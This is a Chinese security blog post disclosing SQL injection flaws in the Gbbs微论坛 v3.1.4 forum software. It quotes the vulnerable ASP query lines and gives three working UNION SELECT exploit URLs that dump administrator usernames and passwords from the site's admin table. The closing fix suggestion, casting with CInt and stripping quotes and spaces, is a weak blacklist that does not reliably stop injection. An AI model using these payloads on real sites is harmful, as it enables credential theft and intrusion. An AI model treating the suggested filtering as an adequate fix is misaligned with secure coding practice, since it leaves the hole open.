您的位置 » 首页 » 实用工具 » 漏洞播报:Gbbs微论坛 v3.1.4注入漏洞附利用EXP

漏洞播报:Gbbs微论坛 v3.1.4注入漏洞附利用EXP

发表于4年前 | 作者: seay | 分类: 实用工具 | 孵化于:2013年05月08日 | 文章热度:4,481 次 全屏阅读

显示不全请点击全屏阅读

官方地址:http://www.softatm.com

漏洞证明:/css/ss.txt

程序下载:http://down.chinaz.com/soft/33484.htm

漏洞文件 /userinfo.asp 72行到74行
漏洞类型:字符型注入
漏洞信息:

<p><%yhm = request("yhm")

set rs=server.createobject("adodb.recordset")

exec="select * from yrwl_tb_admin where yhm='"+yhm+"'"

 

原因:没有过滤注入语句,直接执行查询
危害:sql注入漏洞,直接爆出用户账号密码。

exp:/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin

 

漏洞文件 /userinfo.asp 2行到7行
漏洞类型:字符型注入
漏洞信息:

mc = request("ad")

if mc <> "" then

set rs=server.createobject("adodb.recordset")

''定位

 

sql=”select * from yrwl_ad_dhl where cl=’1′ and mc='” + mc & “‘”
原因:没有过滤注入语句,直接执行查询
危害:sql注入漏洞,直接爆出用户账号密码。

exp:

/ad.asp?ad='%20union%20select%201,2,3,4,5,6,7,8,yhm%2bchr(35)%2bpass%20from%20yrwl_tb_admin

 

 

漏洞文件 /userinfo.asp 32行,52行
漏洞类型:整数型注入
漏洞信息:
id = request(“id”)

exec=”select * from yrwl_tb_lt where id=”+id
原因:没有过滤注入语句,直接执行查询
危害:sql注入漏洞,直接爆出用户账号密码。

exp:/bbs_bj.asp?id=11%20and%201=2%20union%20select%201,yhm%2bchr(35)%2bpass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20yrwl_tb_admin

 

修复方法,整数型过滤字符CInt() 字符型过滤空格和’ Replace(str,”‘”,””) Replace(str,”%20″,””)

 

摘自:http://www.0day5.com 

Tags:

Gbbs漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/2832/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)